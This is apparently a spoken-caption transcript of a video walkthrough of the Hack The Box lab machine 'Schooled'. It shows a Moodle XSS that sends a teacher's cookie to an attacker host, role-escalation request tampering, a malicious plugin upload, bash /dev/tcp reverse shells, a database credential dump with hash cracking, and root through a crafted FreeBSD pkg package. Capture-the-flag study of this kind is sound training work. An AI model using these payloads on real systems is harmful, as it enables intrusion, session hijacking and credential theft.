HackTheBox - Schooled

Captions
What's going on YouTube, this is IppSec, and I'm doing Schooled from Hack The Box. I really like this box because it shows the value of chaining together multiple CVEs to get what you want, and in this case it is a shell on the box. It does that by installing the open source application Moodle, which is essentially just a web application for online schools, similar to Blackboard, Canvas, or Google Classroom; I don't know what other ones there are, but that's not really important. The important thing is there's a few CVEs. It starts out with a cross-site scripting vulnerability in your profile that you can use to steal the cookie of a teacher, and there's another vulnerability that allows teachers to escalate to managers, which is like an administrator, and then there's a third one, once you're a manager, to re-enable the ability to install plugins, which you can use to upload and get code execution on the website. Once you're on the box, it is a FreeBSD box. You crack a user's password, su as them, or you can SSH into the box as that user, and they have the ability to install packages with pkg, which is just like apt but for BSD, and you can create a malicious package and install it to get code execution as root. With that being said, let's jump in. As always, I'm going to start off with the nmap, so -sC for default scripts, -sV to enumerate versions, -oA to output all formats, put it in the nmap directory and call it schooled, and then the IP address of 10.10.10.234.
This can take some time to run, so I've already run it. Looking at the results, we have just two ports open, the first one being SSH on port 22, and the banner tells us it's a FreeBSD box, which I don't have much experience with. However, it is very similar to Linux, so once I get a shell on it I think I'll feel right at home. Then we have a date here. This is probably either the date OpenSSH was compiled or the date of the kernel; I don't know exactly what it is, but it does say it is 2020 February 14th, so I know the box was at least updated on this day. It may be after it, because I don't know how frequent the FreeBSD release cycle is, but if you, like, updated in May and there wasn't a new kernel, maybe this date doesn't get updated. What this does tell us is we don't have to look at really old CVEs like ImageTragick or things like that, because chances are they've been updated. If I saw this as like 2016, 2015, I'd be looking at things like Heartbleed, Shellshock, things like that, but because it's recent I can just ignore all those old vulnerabilities and move on. We also have HTTP on port 80. It's running Apache httpd, and I'm sure we can look at this version with FreeBSD and find out more about when this box was released. I wonder if I can just Google like "php 7.4.15 freebsd" and see what happens. I'm actually not sure. FreeBSD, this PHP version, what does this do? "Exploiting Moodle", I'm guessing this is a write-up or something, yeah, so we'll ignore that. Let's see, FreshPorts php7. I don't know if it really tells us too much. 7.4.15, I wonder if we can pull this. So 04 February 2021, so that's when this PHP version was released, so we know the box was updated in 2021 now, whereas before we were thinking it was just 2020.
So this leads me to believe it is the SSH version and not the kernel version, but if I remember we'll look at that once we get a shell on it. Generally boxes retire like six to seven months after they release, and this means the box was probably updated right before it launched, so we shouldn't look at any of those old CVEs that would affect, like, a package managed by the package manager. So let's go take a look at the website. Going to 10.10.10.234, and am I not connected? Let's see, it is 10.10.10.234. Come on Firefox. There we go. I'm not sure exactly what the delay was there; maybe I had to type it somewhere and copy and paste saved it for me. But we have Schooled, the educational institute, and we're just looking around this. "We are Schooled, an online institution." If we go click Learn More, we can look at the bottom left; that's just going nowhere because it's got that little pound sign after the link, so we don't really have anything here. Looks like we go back to 2004. This is a weird way to do a timeline, like the order is on the right; I've never seen a timeline like that. I'm surprised 2002 is not here. Let's see, testimonials don't have too much. We do have an email address of admissions@school.htb, and because we have school.htb we should probably put that in our hosts file so we can access it over DNS. So let's go back to our terminal and do sudo vi /etc/hosts, and we can say 10.10.10.234 is school.htb. Save that, and then we can take a look at the page to see if it brings us anywhere else. It doesn't look like it does. So while we're looking at this we can set up a quick gobuster, so gobuster dir mode, -u for URL, http://school.htb (we could have done the IP address since it's the same site, it doesn't matter), -w for wordlist, we'll do /opt/SecLists/Discovery/Web-Content/raft-small-words.txt, and we should check if this is PHP, so I'm just going to do like index.php. We don't get anything. Let's try index.html; we get a page, so this is most
likely going to be a static site. If we go to About, we also get about.html, so I can do -x for extension html and that should be good. We probably want to do -o for outfile; we'll just call this dirbuster.out and let that run to see if there's anything interesting. Going to Teachers, we have names, so if we can find like an email address we can figure out how they do emails, or like the username convention, because this is admissions@school.htb, so it may be like lcarter for the username, it could be leanne_carter, it could just be carter, it could just be leanne. We don't know how their usernames work, so that is kind of what I'm looking for on this website, to see if we can get any other emails. The Contact page is a good place to go, and it just brings us up here, so we don't really have too much. It didn't load Google Maps correctly, so no real emails. We do have a copyright of 2020, so we know that's not dynamically updated, and it's not a big surprise because this is HTML, nothing else. We could take a look at the source code to see if it was built with anything, but again I'm not really too interested because this is an HTML site, not PHP, Python, whatever, so I'm going to go on. We'll look at gobuster; we don't really see too much, so let's check virtual hosts out. So let's do gobuster, I think it's vhost, yep, URL and wordlist, so we'll do -u http://school.htb, and the wordlist will be /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt; we'll try top 5000 first and see if this gets us anything. And we have moodle.school.htb, so this is definitely something. Moodle is an open source application to like build courses, things like that, for students. So let's go sudo vi /etc/hosts and add moodle.school.htb in there, and we can take a look at this page, and it looks like a Moodle instance; we can see by this banner here. The first thing we want to do is try to find a way to enumerate this version, so I'm going to go to the GitHub page, because I know this is open source, and we can take
a look at things on this page. So if we go here, we're looking for a way to identify the version, and I always look at like the "months ago", because I want something relatively recent. Like if it's updated six years ago I can ignore this file, because it's not changing that often. Ideally I want something that gets changed very frequently, because that is an indication that something is changing. Like this README, it's six years ago, so it's not going to have version information. Same with like install.txt; since it's not being changed it's of no interest to us. We could check if it exists, so if we go to /install.txt: install.txt not found. Maybe we have to go into /moodle, which will tell us potentially where everything is installed. So /moodle/install.txt exists, which confirms we can access these files, but nothing too interesting. We have version.php and security.txt, so these two are good. Let's try security.txt, see what this is: not found. Let's try version.php; we don't get anything back, because we probably have to be logged in to view this page. If I look at the source code to this it may be quick to tell: defined('MOODLE_INTERNAL') || die, so whatever this field is, it's not defined, so we're dying immediately. I'm guessing like this will be defined if we're coming from an admin page or something like that. So I don't see anything jumping out at me right off the bat. The next thing I like looking at is themes, because generally this is where like a lot of JavaScript files go, so we won't have that issue with PHP where it just displays nothing because it's trying to execute code. JavaScript's generally static, and there's a lot of dependencies, let's say like jQuery. A lot of libraries don't update jQuery that frequently, but if it does you can generally get an idea of the version of something. So like if this was keeping up to date with the latest version of jQuery, which is just a JavaScript library a lot of web applications use, we can see how frequently it commits. Like on this we got
a "five days ago". We look at the releases, we have one in March, one in May, so again you can get an idea of when this web application was released based upon looking at the JavaScript. We also have upgrade.txt; it is eight months ago, but if I click it we can see it looks like it has major versions, so I'm going to try this. So it is /theme/upgrade.txt, and we can see it is saying 3.9, and if we look at this it goes all the way up to 3.11, so we know we're running Moodle version 3.9. The other really nice thing about like searching versions, or using... I don't know what I was going to say. The other thing we can do is look at security announcements. A lot of applications do have security announcements; if they don't, you can look at like CVE databases, but if we look at security announcements it lists all the known, like, major security vulnerabilities to us and tells us if it's like a minor or a major vulnerability, things like that. The thing we don't know now is which to look at, because we could just keep clicking the pages and look at versions fixed and get an idea of what's there, but the better way to go about this is look at when Moodle 3.9 was released and then work our way back. Let's see, Moodle 3.9 looks like it was June of 2020.
If we look at release notes, we can also confirm that day. Release notes are on July 14th, but the release date is June 15th, so I'm guessing the page was just updated July 14th or something, not sure exactly what, but here we just want to go to something that is around June of 2014. So let's go here. Let's see, we're in January 2021, still September 2020, and if we go to the next page that is March of 2020, so it's somewhere on this page most likely. Let's see, that's March, May, May, July 2020, so we know from this day on, Moodle is like anything may be applicable to us, because somewhere between this May 18th and July 20th is when it was patched. We can see this very first thing is a jQuery version; it is only marked as minor, so if we looked at like when jQuery was released we'd probably be able to flag around the time this was updated, because they updated jQuery in response to this vulnerability. So even if upgrade.txt wasn't there, we'd still find a way to enumerate this application. Looking here we have reflected XSS in admin log filter, we have course enrollment allows privilege escalation from teacher role into manager role, denial of service, stored XSS via moodlenetprofile parameter, with another XSS, so there's a lot of cross-site scripting vulnerabilities. Let's go all the way to the bottom and keep going up. "Login as" in course context may lead to privilege escalation, denial of service in chapter name. So we have a lot of vulnerabilities; I don't see anything like unauthenticated. We can look at like searchsploit as well to see if there's any like unauthenticated CVEs, but I don't really see anything there. There's this RCE but it's 3.4.1, so I'm just ignoring that. So let's go take a look back at the website. Let's go to moodle.school.htb, and we are not logged in. We can potentially try to see if we can enumerate usernames to get how they do it, so if I do "lead", because the name was Leanne Carter, it says if you supply the correct username and email it will email you, so it's not
telling us valid usernames, so we can ignore that. Let's try it on the email address, lcarter@school.htb, to see if anything's there. Again, it's the same message whether we had a valid username or email or not, so we can't validate potential usernames, and since I can't validate a username yet, that's why I'm not gonna go down this like password spraying, brute forcing type thing. But let's try creating an account. So we can create the account ipsec, the password of password1, email address let's do root.rocks, copy it, do it again, ippsec. We don't have to do city, state, anything. Create account, and "email is not allowed; we need an email with student.school.htb", so let's do this and just use that domain for this email and see if it works. My first intuition is this won't work because we don't have any way to retrieve this mail to click something that verifies we own the email, but if they don't have email verification on then it'll work. "Click the link below to confirm your account." Okay, and looks like we're logged in, so they don't have any type of confirmation. Looking at the CVEs, we knew there was a CVE where we can get a privilege escalation if we can get to the teacher role, but chances are just signing up doesn't give us that teacher role, so there's not much we can do in terms of the CVE right now. Going to the dashboard, I don't see anything. Let's go back to the home page; where is course enrollments? Site home. So we got four courses; let's check out these, if this gives us any different information now that we're logged in. We can enroll... we can't enroll in Scientific Research, IT, or English, but we can enroll in this Math one, so I'm going to enroll in Math and let's take a look at anything here. The teacher is Leanne Carter. Wait, I'm in English now? What just happened? That was weird; I thought I was enrolling in Math and suddenly I went to English. But back here we are now in the Mathematics course. If I look at it, we can see Phillips has two announcements, or one announcement from
Phillips and one from Jamie. "Reminder for joining students: this is a self-enrollment course for students who wish to attend my lectures. Make sure you have your MoodleNet profile set. Students who do not will be removed from the course before they start," and he will be checking all students who are enrolled in this course. So generally whenever I see someone will be checking something, especially in a CTF, I know there's going to be some type of like automated thing to do interaction. In this case I'm guessing it's going to be a cross-site scripting vulnerability, because if we look at the Moodle thing, we had a stored XSS via moodlenetprofile parameter, and what this is saying is MoodleNet profile set. So I'm going to try to edit my profile and see if I can put some type of cross-site scripting. Go to my profile, edit profile, and here is MoodleNet profile. The first thing I want to do, though, is just test something real quick. I'm just going to put "cross-site scripting" everywhere: description, sure, additional names. I probably should be putting a unique thing here, like unique per field, but I'm not. And let's see if they have input validation here, because this could be a big pain if they do. Doesn't look like they do, and now I'm just looking for wherever there's bold, so we can see this MoodleNet profile does have bold here, so since it's processing HTML we can try cross-site scripting. So if you're trying to look for a 0-day in this and do it on your own, this is generally how I'd go about it, just putting "cross-site scripting" in a bunch of things, and when you get one then you know. So we can edit the profile again and put our JavaScript thing here. Additionally, you could just do what we're about to do and have JavaScript call back to you, and that will help you if there's like a blind thing, so there's a chance that like it's doing input validation, or I guess output validation, on all this JavaScript when we view the profile, but maybe the admin panel is not doing
output validation somewhere and we'll get triggered cross-site scripting. We have no way to identify that, because the cross-site scripting payload we're using is completely visual to us, but if we did something like <script src="http://10.10.14.8/pleasesubscribe.js"></script>, then if it gets triggered elsewhere we'll still know, because of the callback, as long as we're monitoring that. And that's how tools like XSS Hunter work and why they could be useful, because you just stand up the server, put that payload everywhere, and then when you get a callback it kind of tells you the page it was on. So let's do nc -lvnp 80 just to set up a listener to validate that cross-site scripting works. Update profile, and we're hanging right now because we have a connection, and then we close that and the page comes back, so we know we have a way to get code execution. So what I'm going to do is mkdir... well, not code execution, but cross-site scripting. Go into www; I'm going to sudo python3 -m http.server on port 80.
We forgot the -m; there we go. And then we called it what, pleasesubscribe.php? Or not PHP, JS, right? I called it JS, yes I did. So we just have to write JavaScript to do something. My first thought is just to steal the cookie, so I'm going to do document.write, and then we can do, let's do an image: img src is equal to, I'm going to put this in single quotes, http://10.10.14.8/?, and then document.cookie, plus, and we want to close this; that's a single quote there. So what I'm doing is I'm putting this as one thing, and we're terminating the single quote so I can put a variable, which is going to be the cookie, and then let's start the single quote again. We can kill that, and I can't remember if I need a slash for the image; I don't think I do, so let's just do that and see what happens. So we did have the box reach back to us while we were writing that script, and we did not save it yet, so we missed that hit. So let's just refresh the page to make sure everything works. I got this and "not found", so there's a typo somewhere, or not a typo, but I did not put it in the right directory. Sent. So this is me, 10.10.14.8, we got pleasesubscribe, and then the JavaScript sends our cookie, so everything looks like it's going to work. I'm just going to pause the video and wait for the automation to come to get the cookie of the user. So we have the MoodleSession coming back, and this time we can see it's 10.10.10.234.
So what I'm going to do is put this cookie in my browser and see if it works. So I'm going to press F12, then we can go to Storage, Cookies, MoodleSession, and let's change out that cookie to be the other user and refresh the page, and we can see I am now Manuel Phillips, and Manuel Phillips is going to be a teacher role. I'm trying to find a way to validate that. If I go to, let's see, blog, forum, not exactly sure where it would say that. We can definitely see where Manuel Phillips is, and if we look at the courses he is the owner of this Mathematics course. So let's go back to the Moodle security announcements and find that one vulnerability. So this MSA 2009, course enrollment allows privilege escalation from teacher role into manager role: teachers of courses were able to assign themselves the manager role within that course. We have the CVE here, and when searching for public exploits the CVE is generally what you want. You also have the reporter name, so we can first just search this on Google and see what happens. The reporter's name is right up front; I was going to say if we don't have anything then we could put his name in there as well to find it, or put the CVE in GitHub. Looks like there's some automated scripts to exploit it, but I don't want to do the automated script; I like stepping through it for these videos, so that's what we'll do. He's showing that you can use Docker to just pull the exact Moodle version and then test it that way. He does provide an actual Python script, but also a blog and video. I wonder what the blog says... When I did it, did I just get like popped? That was weird. uBlock Origin blocked something; well, I don't know what's going on there. Let's not go to that link. I'll revert this VM when I'm done with this video; that's definitely a little concerning. But yeah, so sometimes when you click links weird things happen, and when weird things happen it's pretty bad. We can look at the video proof of concept, and this is essentially how I did it. I'm
not going to watch this whole thing because we can explain it. So the first thing we have to do is get the manager of Moodle, and the easiest way to do that is on the school page, or we could do it kind of like through trial and error, or just clicking around Moodle, but Leanne Carter is the manager; she's the only one that has this. So if we go back here, let's see, let's close some of our unused tabs. There we go. So let's go Courses; we need to find a way to enroll a user, so let's see, Site home, My courses, that's where I'm at, Participants, Enrol users. And it bothers me; I think this is spelled correctly, it's just a different like dialect or something. I always thought enroll had two L's, but I digress. So we want to select Leanne Carter because she is the manager, and then the assigned role doesn't matter too much, and we also have to get our user ID, so that is the next piece of this. So before I do anything, I'm going to try to find... and generally like on a profile page or something is where you can find your user ID. So let's go to Profile; my ID is 24.
So let's turn Burp Suite on. Where is this? Burp, do this, Proxy, Intercept on, Enrol user, and we can see the action enrol, enrol ID. One of the easy ways to edit things is through this Inspector tool in Burp Suite; now we don't have to go read all this, we can just see this user list. We have to change this from 25, which is the user ID of Leanne Carter, to 24, which is the user ID of us, and then we also want to change the role to assign to be 1. Generally the most like admin role is going to be 1; 5 is probably the teacher role. So these are just identifiers of what role it is, and if you don't know this you could have to look through like the Moodle source or look through the CVE, things like that. So we change the user list to our ID and the role to assign to 1. I'm gonna put this in the Repeater tab and send it, and we have success: true. So now if I go to the dashboard, we disabled Burp Suite, let's go back, see, is Leanne Carter enrolled? Where are you, Leanne? She should be in here. Travis Wright, role Student; Manuel Phillips, Manager, Teacher. I wonder if I have to... let's see, 25, I think I have to enrol Leanne Carter as well into this course, so I'm going to Enrol users and we'll just do Leanne, and this time we won't edit anything. And now when I click on her page I can do "Log in as", and this wasn't here if we did not do this one step, this one step with some weird like mass assign... well, not mass assignment, probably an IDOR vulnerability into being able to assign the permission to do what I just did. So now we are logged in as Leanne Carter, and Leanne Carter is a manager. So if we go to Site administration, Plugins, we can see we can't install plugins because it is disabled, but if we, let's see, where is it, there's something here where we can go and enable it. See Site administration, block edits on, where are you, I think it's under Users. Yeah, Define roles, and then let's see, Allow role assignments. If we save the change here, this is going to be, I think, a mass assignment vulnerability
or maybe it's role override. Manager already checked everywhere. I think this is actually a mass assignment vulnerability, and that's when you're able to make changes to things that the web UI just doesn't like give you the ability to, but if you put it there you could do it anyways. So to kind of explain that, let's save changes, and I sent this to Burp Suite so we can look at this. Where is it? Moodle, come on, let's turn Burp Suite off real quick. Manage roles, manager, okay, this one's it. So we got all these things here, and maybe it's on the page, but where is save, edit, reset? So if we edit this we could try clicking allow on all, but the blog post is going to give us something that is super handy, and then we'll go over it. So we have all these fields here. I'm going to send this over to Repeater, and what the blog post wants us to do, if we still had that up... let's turn Burp Suite off, go to the GitHub page. The blog post wants us to copy this, so we just copy this whole thing, and then after we do this we're going to look at kind of what's changed to kind of explain the mass assignment; I think that'll probably be the easiest thing. We leave the session ID and paste everything else. Come on, get to the bottom; I want to be faster. If I just do page down, paste, put that in a new tab, see manage, reset type, we send this, See Other. So now let's go back here and go to the plugins to see if we can install a plugin. Site administration, Plugins, and now we have this "Install plugin", and almost anything that lets you install a plugin means you can just get code execution, because you can just create a malicious plugin. But before you do that, let's take a look at exactly what we just did, because this was unclear. I guess I could have used the drag bar earlier, so I'm going to vi 1.txt, and this is going to be our edited one, and then I'm also going to vi 2.txt, and this will be unedited; we can just grab it from here, this will probably be the safer bet. So copy, save, and right now this probably looks like an
unmanageable mess, right? Like how do we find out what's different here? Well, we could save both of these and like do a diff on the files, but it's not gonna really be too helpful. So I'm going to press the tmux magic key, which is Ctrl-B for me, and then colon, and we can do set-w synchronize-panes, that's synchronize-panes, so now anything I do in one pane happens on the other one. And I'm going to just hit colon, s, and we're going to look for the ampersand and we're going to replace it with \r, which is a return, and now we have this. We also probably want to sort, just to sort everything, so I did colon sort, and now we have everything here. We go to the very bottom and we can see the one on the right has 1242 lines; the one on the left only has 729, so we know there is a difference between the two. And we can see, let's see, allowassign 1, 2, 3, 4, 5; the one on the left, this is the exploit, is going all the way to 8. So I'm going to disable the set-w, actually do it in tmux, set-w synchronize-panes, so we can add things. So we had 5, 6, 7, 8; 6, 7, 8, just so these are starting to line up, and I can see the bottom line here is archetype equals manager, and it's not that for the exploit. So we can see it is just adding a lot of variables: this allowoverride 1, 2, 3, 5, 6, 7, 8, that is good; this allowswitch, this is going 6, 7, 8, so that's what it looks like. And we can go here, we have 1, 2, 3, 4, 5, 6, and this is ending at 5, so we're missing two lines somewhere. So let's see, line 18, is that 27? Is this allowswitch? Oh, we're missing 1, 2, 3, or 1, 2, so if I do two lines, there we go. So this is called mass assignment because the web interface isn't giving us the ability to set a lot of the variables; however, on the server end it's just looping through all these parameters and will just assign them into the database even if you're not supposed to be able to. The website doesn't have the
logic to assign these things, but the server end, because it's dynamic, it does have the logic, so if you sent that to it anyways it would assign it. Another common place where you normally see this vulnerability is like the registration forms, where you just register an account and then it's passing variables in, and essentially what the web application is doing is it's looping through every variable you did and putting it into the registration database, and it's saying, you know what, if the group doesn't exist I'm going to assign it the default group, which would be student. But if you just sent the parameter group=admin, there's a chance the web application just sees that and goes, oh, this isn't taking the default group, and assigns it to the admin role that you specified. So mass assignment, in my understanding, is generally when you send it a parameter it's not expecting but it will work with anyways. So with all that being said, let's just go back to this and see if this still works. It looks like it's still enabled, and we have to install a malicious plugin. In this it looks like he is installing something called block rce; let's see, he's downloading it here, so this is the malicious plugin, so we can just download this. So let's close these panes because we don't need them. We can do git clone, paste this, moodle rce. Oh, we don't want to unzip it, actually. Let's see, we can just do it, and then the main blocks rce, okay. So Install plugin. Oh no, not Moodle directory, zip, and where do we upload our own? Upload a file, browse, and then we want to htb, Schooled, and moodle rce, rce.zip. I wonder if I have to specify any of that; doesn't look like I do. Install plugin from zip, validation, install can continue, so we continue and let's see if we can get code execution. So domain/blocks/rce, so domain, let's try it here, so we're doing moodle.school.htb/moodle, cmd is equal to id. Boom, we have it. So I'm going to set my Burp Suite back on, refresh this page, and what I want to do is change
the request method to see if it accepts POST, and it doesn't. So the annoying thing with this plugin is it's only a GET parameter, which, that is fine, but we just know we have to work with it like this. So I'm going to do, let's see, let's see if this reverse shell works. It may not work because it's BSD: bash -i, then /dev/tcp/10.10.14.8/9001, 0>&1, and then we want to URL encode this. nc -lvnp 9001, send. Oh, it does work. So we can do python3 -c 'import pty; pty.spawn("bash")'. python3: command not found. Let's do which python. Which script? We do have script. Shoot, how do I do it with script? I think script -q, and then is it bash, /dev/null? Let's do script -q /dev/null, like that. I know there's a way to get a proper PTY with this script binary. Let's see, script file command, so I thought it was script -q /dev/null bash; I wonder if BSD is not letting me do that. Let's do script -q /dev/null bash. So it's working on my box but not working here. The other thing, Python may just not be in the path, so I'm going to do find / 2>/dev/null to hide errors, and we can grep for python, and we can see python37 does exist, so it is somewhere. I may want to grep for like the path ending in python, or we can try like /usr/local/bin. Let's echo $PATH; we only have /sbin, /usr/sbin, and /usr/bin; we don't have /usr/local/bin. So /usr/local/bin, that is a directory, and we can grep for python and it is in here. So I'm going to put /usr/local/bin as part of my PATH, so I'm going to do export PATH, is it, do I have to export or just do PATH? PATH=$PATH:/usr/local/bin, echo $PATH. Oh, that was not good, oh, because I didn't put this in capitals. Do I still have this? Yeah, so let's do this. So we still have our path, so PATH is equal to this, /usr/local/bin, then which python3; now python3 exists. So we can do python3 -c 'import pty; pty.spawn("bash")', and now watch, the pty.spawn or pty library is not gonna be here, right? "cannot get access
to parent directories. python3 -c 'import pty; pty.spawn("/bin/bash")'. There we go. I wonder if the script would have worked if I just wasn't in that directory; something weird is going on, but oh well. stty raw -echo, and then hit fg, enter, enter, and now we have tab autocomplete. So what we want to do is probably cat /etc/passwd, and we can see there are a few users on this box. What I'm going to do is the same exact thing but grep -v nologin, and we can see the users we have: root, tor, su tor, su - tor. So it looks like we can't su. Yes we can, su jamie. Okay, we can, we just can't get into that user, oh, because he probably doesn't have a login shell or something. But we have jamie and steve that we could potentially escalate to. So the thing I want to do is get jamie's or steve's password, and if we go back to moodle.htb, we can see I think one of them is a teacher. It's called htb, my bad. Teachers: jamie. There is no steve here, so I don't know exactly who steve is, but jamie, or Jamie Borham, is probably going to be this jamie user, so that's the user I specifically want to target. BSD's web directory is not going to be /var/www/html; it's going to be in this directory, so I'm going to go here and look for Moodle's configuration file. So let's do cd like this, and then, oh, where is Moodle's config? find . | grep config, admin, auth. So when I don't know where the database password is in an application, generally I just do a google on "update database password moodle" and look at how I change it. So let's see, phpMyAdmin, MySQL database, MySQL password change, I need to change it somewhere in Moodle. So moodle installation config.php. cat config.php. Oh, it was there, okay. So yeah, but generally that's how I find the files. So we have mysqli native, localhost, here we go, database password. So mysql -u moodle, I can do -d to specify the database of moodle as well, I think it's -D, and then we need to tell it we want to use a password, so -p, and
then paste the password, PlaybookMaster, was it 2020? Yeah. So we can do show tables, and we have a lot. I'm going to look at the user table, so I'm just highlighting everything with users, and let's see, user daily, portfolio, chat users, there's a lot of tables in Moodle, oh god. Maybe chat users? It doesn't sound like it. Let's see, user daily, oh, mdl_user. So let's do describe mdl_user, and the reason why I'm doing describe first is because if I just do select * mdl_user, select * from mdl_user, that's a lot of stuff. We can see all our XSS tests, and we can look, a lot of these don't even store the HTML tags, so if I was looking for a 0-day I'd look for the logic that's removing these HTML tags and see if I can encode it in a different way to trick the thing that is removing it, because if it gets in the database, chances are it'll work. So let's do describe, then we want to look for fields that are of interest to us, probably username, password and firstname, potentially email. So username, password, firstname, email. select username, password, firstname, email from mdl_users, or is it user? Yeah. And the reason why I wanted these fields is in case the username is an indication of jamie; firstname would definitely be jamie, and email is just good to know. If we wanted to format it properly, though, I probably should take that email off; we can just do firstname and password. There we go. So we know there are two users on the box, it was what, steve? Let's see if I do exclamation point, I think it will execute the bash command: /etc/passwd, grep -v nologin. Maybe that's not how you do it, but we know we wanted, shoot, we know we wanted jamie, and this is actually a pretty decent hashing algorithm, so I'm not going to try to crack all these, because if I put all these in, then hashcat would have to attempt each one each time, or john or whatever hashing program you use. So I just want to do this one so it goes as quick as
possible. We're doing jamie because jamie has an account on the box. So I'm going to vi a .txt file, and I think my Kraken is busy right now so I can't switch to that; I'm just going to use john. So john -w, /usr/share/wordlists/rockyou.txt, I think it's --wordlist=, I think that's how you do it in john, .txt. We'll see, bcrypt. So I'm going to let this wait to see if it cracks. We have the password cracked, so we can just grab this and go back to the reverse shell and do su jamie, paste in the password, and we are now jamie. We can try SSH-ing, so let's try ssh jamie@10.10.10.234, yes, put the password in, and we can SSH in. I always prefer SSH connections because it's just more stable than a reverse shell and better for persistence, so I'm going to be working off of this. If I do sudo -l, we can run sudo, and I thought BSD normally used doas, but maybe that's OpenBSD and FreeBSD uses sudo; I'm not exactly sure of the difference between doas and sudo in BSD land, but we can see we can run pkg update and pkg install. So I'm going to go to GTFOBins, and is it gtfo, maybe it's .com, I'm just going to google it real quick, like this, pkg, and we can do pkg with sudo, and it looks like mkdir, we've got fpm, and fpm is something we used before. I believe if I go to ippsec.rocks, fpm, we used it in Armageddon to install and build packages, so I'm going to do that again. pkg install -y --no-repo-update, and then we can specify this. Is that going to work in this pkg install? I believe it is. So let's create this package. So do I still have fpm? cd /opt/fpm, let's see, github fpm package create, and if we don't do this we'll just create the package manually. So there's this fpm to make it quick and build packages. Okay, how do I build this? This is, oh, Ruby I think, is it? I just saw Ruby right there, spec, I'm guessing it is. Is there a bin/fpm? Let's just clone this, or go to releases, 131, just source code. I really forget how to use this, I may have to pause the video and watch that
video, pause this video to watch another video. See, rake build, is that it? I wonder if that's not, I read this as a package error, like it didn't have a library to run, but maybe it's just a normal error of not giving it all the correct parameters. So let's try this, just copy these, paste. Okay, it does work. mkdir attempt, TF=, echo $TF. So that's just a temp directory name, and it's echoing something to a file and then executing said file. So we probably want to echo, let's see, /tmp/shell.sh to $TF/x.sh, and we can probably just copy this. See, it already exists, so let's go to /tmp and delete everything we did, rm -rf tmp.*. So TF is equal to that, mkdir, we're executing /tmp/shell and creating, file already exists. Let's see what file did it create, it was like an x one. That's it, that's the file it's complaining about. So now we've created this package. Let's host it, http.server, go back to our shell, wget 10.10.14.8/, what was it, x-1.0, port 8000, paste it, curl -o x-1.0.txz. Okay, and I'm going to vi /tmp/shell.sh and I'm just going to echo test to /tmp/pwned, and we probably should #!/bin/csh. I'm doing csh because that is the shell in FreeBSD; if I look, it's not /bin/bash, it's /bin/sh, it's /bin/csh, so that's why I'm using that. Do I have bash? which bash, /bin/bash, it does have bash, so I'm going to change it out to be /bin/bash. chmod +x /tmp/shell.sh, and we can go back to the GTFOBin to try to execute it. See, new package to be installed is not specified in the manifest. Do ls -la on /tmp and we do have a pwned owned by root. So if I do /tmp/shell.sh, let's try a reverse shell, so -i /dev/tcp/10.10.14.8/9001 0>&1.
That should be fine. What if we have to create a new package? Looks like we don't, and we are root. And funnily enough, this is a new GTFOBin, I believe, and that's not really the intended way. The intended way involves creating this package, but actually using the update feature as well. So I'm control-C-ing here and it's actually exiting my root shell, but we skipped one step of the intended way of doing it, that I honestly didn't know would work when I was doing this. But we're supposed to create a package like we just did, and then we are supposed to find out that we're part of the wheel group, and ls -la /etc/hosts is modifiable by wheel, so we can edit /etc/hosts and then point devops.htb, which, if we look at cat /etc/pkg/FreeBSD.conf, this is where the repository is, so we can edit this to be us, .14.8, and then we run a pkg update. python3 -m http.server 80 with sudo, already in use because we used it for our XSS. So right here, if we run pkg update with sudo, it makes a GET to us. So we're supposed to create this whole package repository. So to do that we can go to google and say, what is it, pkg create package, see, creating packages, I don't know if that's the post I want, FreeBSD without installing, creating custom packages, this can be a good one. Yeah, so it makes a request to meta.conf, meta.txz and packagesite.txz, so we have to create each of those files. I think there may be a pkg repo command to create something; I haven't actually done it, so this will be a test. I'm going to move the malicious package we created into /tmp and then we're going to do pkg repo ., and yep, it created all those files for us. So we've just got to get these files back to us, so let's go into www and we can scp, let's see, 10.10.10.234:/tmp/* into this directory, and then we need jamie, we also need the password. Do I have john still here? I do, so we can just grab this password, paste, scp each file, python3, and then pkg update, sudo pkg update. We may have to
edit the hosts file again because it does revert. So let's change this back to 127.0.0.1, 127.0.1, my IP 10.10.14.8, 10.10.14.8. We update, once it, and packages, so mkdir packages, pkg update and then do 10.10.14.8. This reverts pretty quickly. So we updated the packages and we may be able to do sudo pkg install x, and that does not look like it worked: wrong architecture. So it's marked as Linux instead of BSD, and that's probably because we had created this x-1.0.txz on Linux. Is it xv? Let's see, xjvf, I don't think this is the right syntax. No, let's see, enter, extract xz, let's try this, just xf. Yep. So let's see, +COMPACT_MANIFEST, cv, not there, meta.conf, packagesite.txz, no. See, mkdir /tmp, mv, is it in this vx.sh? This is just executing a shell, let's just try this real quick. We probably have to vi /etc/hosts, 10.10.14.8, it's there. pkg update, this is pretty annoying to do it this way; GTFOBins makes everything easy. sudo pkg update, sudo pkg install, I wonder if I do, does it still say Linux? Wrong ABI, Linux. So it's probably this manifest thing, it's specifying Linux 5 whatever, and that's probably from the fpm. So github fpm BSD build packages, how do we change this, like a man page, documentation, see understanding the basics, there's got to be a way to be able to change the architecture. I'm actually just going to move away from fpm and just edit what it created. I probably can just untar this, edit it by hand, and then create it, so that's what I'm going to try. mkdir, please work, mv x into this directory, oh god, mv please into please work, x-1.0.txz, xf this file. And the reason why I moved into this directory is because it does create things, so I just wanted to see everything it unzipped and not clobber the directory I was in. I'm going to erase this txz and then we want to edit this manifest, +MANIFEST like that, how do I edit this file, single quotes, I feel like this is an OverTheWire challenge now. See if I vi *MANIFEST like that, oh god, is it going to
make me use nano? Is nano going to handle this? Oh god, this may be like the only time you'll see me being like, how do I do this in vim, and then switch to nano. It's a little embarrassing but hey, it works. So we want to change this architecture from Linux to FreeBSD, so FreeBSD:13:amd64. Ctrl-X to save this. Let's go, +COMPACT_MANIFEST, do the same thing here, so FreeBSD:13:amd64. I'm not sure what that 13 means, maybe it's the FreeBSD version. No, file name, right, +COMPACT_MANIFEST, there we go. So we want to tar this, so tar, let's see, tar create xz, create our xz in one command, so capital J is xz, so -cJf x-1.0.txz and then *, right. So now we have this package again, so python3 -m http.server. We probably just move this, so let's move it up two directories and move packages to packages.old, mkdir packages, and we want to recreate this, so mkdir package, curl 10.10.14.8/x-1.0.txz -o x-1.0.txz. That's saved. That was pkg repo . Okay, so we want to go in packages and then scp everything again, copy jamie's password, sudo vi /etc/hosts, it's not sudo here, just /etc/hosts, change this to 10.10.14.8 and then sudo pkg update, sudo pkg install x. What, pkg update, was it still Linux 5?
